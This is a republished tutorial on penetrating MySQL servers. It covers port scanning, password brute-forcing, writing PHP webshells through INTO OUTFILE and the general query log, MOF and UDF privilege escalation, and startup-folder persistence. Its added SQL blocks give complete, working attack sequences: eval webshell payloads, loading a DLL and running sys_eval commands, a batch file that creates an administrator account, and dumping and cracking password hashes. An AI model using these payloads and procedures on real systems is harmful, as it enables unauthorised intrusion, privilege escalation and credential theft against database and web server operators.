Master MySQL Penetration: From Recon to Privilege Escalation
This article details comprehensive MySQL penetration techniques, covering information gathering, password cracking, webshell deployment, and multiple privilege‑escalation methods using tools such as Nmap, Metasploit, sqlmap, MOF, UDF and startup script exploits.
1. MySQL Information Gathering
MySQL is one of the most widely used databases, and reconnaissance starts with its default port, 3306: a port scan such as nmap -p 3306 192.168.1.1-254 (or scanners like iisputter), version detection with the Metasploit module auxiliary/scanner/mysql/mysql_version, the query SELECT @@version once a session exists, and sqlmap detection with sqlmap.py -u url --dbms mysql. The version matters for everything that follows: it decides the password hash format, the default of secure_file_priv and where a UDF library has to be placed. Management interfaces (phpMyAdmin, Navicat, MySQLFront) keep connection settings in configuration files that may expose credentials.
2. MySQL Password Acquisition
2.1 Brute‑Force Techniques
Common approaches include web‑based multi‑threaded cracking (Burp Suite, custom phpMyAdmin tools), Metasploit auxiliary/scanner/mysql/mysql_login with parameters such as RHOSTS, USERNAME, PASSWORD, and Nmap scripts --script=mysql-brute or --script=mysql-empty-password. Tools like hscan can also be used with custom dictionaries.
2.2 Source Code Leakage
Configuration files (e.g., config.php, web.config, jdbc.properties) and their backups often contain database connection strings. Editing tools may leave .bak copies behind, and local file inclusion vulnerabilities can reveal these files.
2.3 File Inclusion
Local file inclusion can be leveraged to read configuration files and extract usernames and passwords.
3. Obtaining Webshells via MySQL
Webshells can be written with SELECT ... INTO OUTFILE, provided the account holds the FILE privilege, secure_file_priv does not block the target directory, the web root path is known, and the MySQL service account can write there. Example of a simple PHP backdoor:
SELECT '<?php @eval($_POST[antian365]);?>' INTO OUTFILE 'D:/work/WWW/antian365.php';
Other methods use LOAD_FILE to read existing backdoor files, or exploit CMS admin accounts (e.g., DedeCMS, phpCMS, Discuz!) to upload malicious PHP files. The general query log can also be abused to write a shell, because general_log_file is not restricted by secure_file_priv (changing it does require the SUPER privilege, or SYSTEM_VARIABLES_ADMIN on 8.0):
SET GLOBAL general_log='ON';
SET GLOBAL general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';
The logged statement text lands in cmd.php together with the rest of the log; PHP ignores everything outside the <?php ... ?> tags, so the file still executes. Note that assert() no longer evaluates string arguments in PHP 8, so use an eval()-based payload against current PHP. Sqlmap (--os-shell, --file-write) can also drop a shell when the same write conditions are met.
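The full write sequence with the preconditions checked first, as an added example that is not part of the original article. It assumes a Windows target whose web root is D:/phpStudy/WWW (a placeholder path; substitute the real one) and an account holding the FILE and SUPER privileges:

```sql
-- Added example, not from the original article. Placeholder web root:
-- D:/phpStudy/WWW. Requires FILE (INTO OUTFILE) and SUPER (SET GLOBAL).

-- 1. Preconditions for INTO OUTFILE: the FILE privilege and secure_file_priv.
SHOW GRANTS FOR CURRENT_USER();
SHOW VARIABLES LIKE 'secure_file_priv';
--   ''      : writes allowed anywhere the MySQL service account can write
--   '/path' : writes restricted to that directory (5.7+ installs default to one)
--   NULL    : INTO OUTFILE and LOAD_FILE disabled entirely

-- 2. Direct write, only when secure_file_priv permits the web root.
SELECT '<?php @eval($_POST["pass"]); ?>' INTO OUTFILE 'D:/phpStudy/WWW/shell.php';
-- Read it back to confirm the write landed where expected.
SELECT LOAD_FILE('D:/phpStudy/WWW/shell.php');

-- 3. General-log route: not subject to secure_file_priv, but needs SUPER and the
--    service account must be able to create the file. Save the old settings so
--    the server can be returned to its original logging state afterwards.
SET @old_log  = @@global.general_log;
SET @old_file = @@global.general_log_file;
SET GLOBAL general_log = 'OFF';
SET GLOBAL general_log_file = 'D:/phpStudy/WWW/cmd.php';
SET GLOBAL general_log = 'ON';
-- The statement text is logged verbatim; PHP executes only the tagged part.
-- eval() rather than assert(): string assertions are gone in PHP 8.
SELECT '<?php @eval($_POST["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';
SET GLOBAL general_log_file = @old_file;
SET GLOBAL general_log = @old_log;
```

Turning the log off before switching general_log_file keeps the server from writing the switch itself into the new file and makes the restore order symmetric; everything logged between the two SET GLOBAL general_log statements, including the statement that changes the file name, ends up in cmd.php, which is why the PHP tags rather than the whole file are what matter.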
4. Privilege Escalation Methods
4.1 MOF Exploits
MOF files can be compiled via Mofcomp.exe, the IMofCompiler interface, or by dropping them into %SystemRoot%\System32\Wbem\MOF, where the WMI service compiles them automatically. A sample MOF payload registers a permanent event consumer that creates a user and adds it to the administrators group. The exploit requires a MySQL account with the FILE privilege (in practice root) to write the MOF file, and a MySQL service running with enough rights to write under System32. It only works on Windows XP and Server 2003: from Vista onward Windows no longer auto-compiles files dropped into that directory.
4.2 UDF Exploits
Custom User-Defined Functions (UDFs) such as cmdshell, backshell, or sys_eval are provided by a shared library (a DLL on Windows, a .so on Linux) that must match the server's operating system and bitness. On MySQL 5.1 and later the library must sit in the directory reported by the plugin_dir variable, so it is usually written there with INTO DUMPFILE, which requires the FILE privilege and a secure_file_priv setting that permits the path. After the function is registered with CREATE FUNCTION ... SONAME, commands execute with the privileges of the MySQL service account, e.g., SELECT sys_eval('whoami');. Cleanup involves dropping the function and removing the library file.
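The UDF loading sequence end to end, added here as an example that is not from the original article. The library name udf.dll, the hex blob and the plugin_dir path are placeholders; the library must be built for the server's OS and bitness and must export the function being registered (sys_eval comes from lib_mysqludf_sys):

```sql
-- Added example (not from the original article). Placeholders: the DLL hex
-- blob, the file name udf.dll and the plugin_dir path shown below.

-- 1. Fingerprint the server: the library must match OS and bitness.
SELECT @@version, @@version_compile_os, @@version_compile_machine;

-- 2. Where the library must live (MySQL 5.1+ refuses SONAME outside plugin_dir)
--    and whether INTO DUMPFILE is allowed to write there.
SHOW VARIABLES LIKE 'plugin_dir';
SHOW VARIABLES LIKE 'secure_file_priv';

-- 3. Write the library. INTO DUMPFILE emits one row's bytes with no terminators
--    or escaping, which a binary needs; INTO OUTFILE would corrupt it.
--    The hex string is truncated here: supply the whole DLL.
SET @dll_hex = '4D5A90000300000004000000FFFF0000...';
SELECT UNHEX(@dll_hex) INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/udf.dll';

-- 4. Register and use the function. Commands run as the MySQL service account.
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
SELECT sys_eval('whoami');

-- 5. See what is registered, then clean up. MySQL unloads the library once its
--    last function is dropped; delete udf.dll from plugin_dir afterwards.
SELECT name, dl FROM mysql.func;
DROP FUNCTION sys_eval;
```

A DLL of several hundred kilobytes as one hex literal can exceed max_allowed_packet; raise it with SET GLOBAL max_allowed_packet (SUPER needed) or write the file in chunks with a staging table when the single-statement write is rejected.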
4.3 Startup Script Exploits
By inserting VBS or batch scripts into a table and exporting them to the all-users startup folder, e.g.
SELECT * FROM a INTO OUTFILE 'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs';
an attacker can have a new admin user created at the next interactive logon rather than at boot. The script runs with the privileges of the user who logs in (and, under UAC, with the unelevated token), so it only succeeds in an administrative session; writing to that folder also requires the FILE privilege, a permitting secure_file_priv, and write access for the MySQL service account.
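A concrete version of the staging-table approach, added here as an example that is not from the original article. It uses a batch file instead of VBS to avoid quoting, and a placeholder account name and password; the caller needs the FILE privilege, secure_file_priv must permit the Startup folder, and the MySQL service account must be able to write there:

```sql
-- Added example, not from the original article. Placeholders: the account
-- name 'pentest', its password, and the Startup folder path.
CREATE TABLE IF NOT EXISTS tmp_script (seq INT, line VARCHAR(255));
DELETE FROM tmp_script;
INSERT INTO tmp_script VALUES
  (1, 'net user pentest P@ssw0rd_change_me /add'),
  (2, 'net localgroup administrators pentest /add');

-- The FIELDS/LINES clauses matter: the defaults escape backslashes and quotes
-- and end lines with '\n'. A batch file needs the text untouched and CRLF.
-- ORDER BY keeps the two commands in the right order in the output file.
SELECT line FROM tmp_script
  ORDER BY seq
  INTO OUTFILE 'C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/iis.bat'
  FIELDS TERMINATED BY '' ESCAPED BY ''
  LINES TERMINATED BY '\r\n';

-- Verify the file on disk, then drop the staging table.
SELECT LOAD_FILE('C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/iis.bat');
DROP TABLE tmp_script;
```

INTO OUTFILE refuses to overwrite an existing file, so a second attempt with the same name fails; pick a new name or remove the old file through another channel.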
5. Additional Exploits and Password‑Cracking Tools
Notable vulnerabilities include CVE-2012-2122, an authentication bypass in which the result of memcmp() on the password token was truncated to a char, so on affected builds any password is accepted with a probability of roughly 1 in 256; the Metasploit module auxiliary/scanner/mysql/mysql_authbypass_hashdump simply retries the login until it succeeds and then dumps the hashes. exploit/windows/mysql/mysql_yassl_hello exploits the yaSSL Hello buffer overflow (CVE-2008-0226), and exploit/windows/mysql/mysql_start_up automates the startup-folder technique above. Password-cracking utilities include Cain, hashcat and John the Ripper; the mode must match the hash format: hashcat64.exe -m 200 mysql.hash for the 16-character pre-4.1 format, -m 300 for the 41-character mysql_native_password format (supplied without the leading '*'), and john --format=mysql or john --format=mysql-sha1 hashes.txt for the same two formats respectively.
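An added example (not from the original article) that shows how the two legacy hash formats are constructed, so a dumped hash can be matched to the right cracking mode. It assumes read access to mysql.user, and a server of 5.7 or earlier for OLD_PASSWORD() and PASSWORD(), both of which 8.0 removed:

```sql
-- Added example, not from the original article. Assumes SELECT on mysql.user.
-- Dump the hashes (column is authentication_string on 5.7+; 5.6 and earlier
-- keep them in the password column).
SELECT user, host, plugin, authentication_string FROM mysql.user;

-- How the two legacy formats are built, run against a known value so the
-- shapes are recognisable. OLD_PASSWORD() and PASSWORD() do not exist on 8.0.
SELECT OLD_PASSWORD('secret') AS mysql323;
-- 16 hex chars: hashcat -m 200, john --format=mysql
SELECT CONCAT('*', UPPER(SHA1(UNHEX(SHA1('secret'))))) AS mysql_native;
-- '*' + 40 hex chars, identical to PASSWORD('secret') on 4.1 through 5.7:
-- hashcat -m 300 (feed it the 40 hex chars without the '*'), john --format=mysql-sha1

-- Classify the dump so each account goes to the right mode.
SELECT user, host,
       CASE
         WHEN authentication_string = ''               THEN 'empty password'
         WHEN plugin = 'caching_sha2_password'         THEN 'caching_sha2 ($A$005$...): hashcat -m 7401'
         WHEN authentication_string LIKE '*%'
              AND LENGTH(authentication_string) = 41   THEN 'mysql_native: hashcat -m 300'
         WHEN LENGTH(authentication_string) = 16       THEN 'mysql323: hashcat -m 200'
         ELSE CONCAT('other plugin: ', plugin)
       END AS hash_type
FROM mysql.user;
```

The mysql_native_password value is unsalted SHA1(SHA1(password)), which is why it cracks at raw-SHA1 speeds; the 8.0 default caching_sha2_password is a salted, iterated SHA-256 scheme and is far slower per guess.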
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
ITFLY8 Architecture Home